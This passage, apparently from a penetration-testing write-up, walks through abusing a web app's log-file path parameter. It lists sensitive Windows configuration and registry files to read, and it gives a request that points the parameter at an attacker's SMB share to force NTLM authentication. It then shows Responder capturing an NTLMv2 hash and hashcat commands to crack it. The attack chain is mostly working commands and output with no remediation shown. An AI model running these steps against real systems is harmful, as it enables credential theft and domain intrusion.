• Learn about the domain? Check the OS version? - C:\\Windows\\debug\\NetSetup.log?
• Enumerate all sites and their locations on disk? Maybe some encryption keys? - C:\\Windows\\System32\\inetsrv\\config\\applicationHost.config
• Learn application details like possibly unencrypted connection strings? - C:\\inetpub\\wwwroot\\{location discovered from applicationHost.config}\\web.config
• Check out the registry? - C:\\Users\\Administrator\\NTUser.dat
• What about a network share? NetSetup.log will show you the domain controller. - \\\\{domain controller}\\

GET /TargetApp/api/logs?path=\\\\my.attackserver\\something.txt HTTP/2
Host: target.oops
Authorization: Bearer <jwt>

┌──(haxan@attackserver)-[~]
└─$ sudo responder -I eth0 -A
...
[SMB] NTLMv2-SSP Client   : 128.64.32.16
[SMB] NTLMv2-SSP Username : OopsDomain\OopsUser
[SMB] NTLMv2-SSP Hash     : OopsDomain::OopsUser:c06fc8d0f047aff2:2E4DC64AE6313D2C8F14228919E72C50:010100000000000080579603500450058004A00440043004400580004003400570049004E002D0043004700420035600040002000000080030003000000000000000000000000030000069BA9CC7713D191478433EF5D0B8B4D4A770B212F1D7246D49D304240A001000000000000000000000000000A310045005877FBE7DA0102FD48E8F64EDD6B0000000002000800300055004C00440001001E00570049004E002D0043004700420004A0044004300440058002E00300055004C0044002E004C004F00430041004C0003001400300055004C0044002E004C004F00430041004C0005001400300055004C0044002E004C004F00430041004C000700080080579677FBE7DA01068C65000000000900400063006900660073002F007300630061006E006E00650072002E007300740072006100740075006D00730065006300750072006900740079002E0063006F006D000000000000000000

└─$  echo 'OopsDomain::OopsUser:c06fc8d0f04...' > hash.txt
└─$ hashcat -m 5600 hash.txt password_list.txt -o cracked.txt

(-m 5600) mode 5600 - NTLMv2
(-o cracked.txt) - output file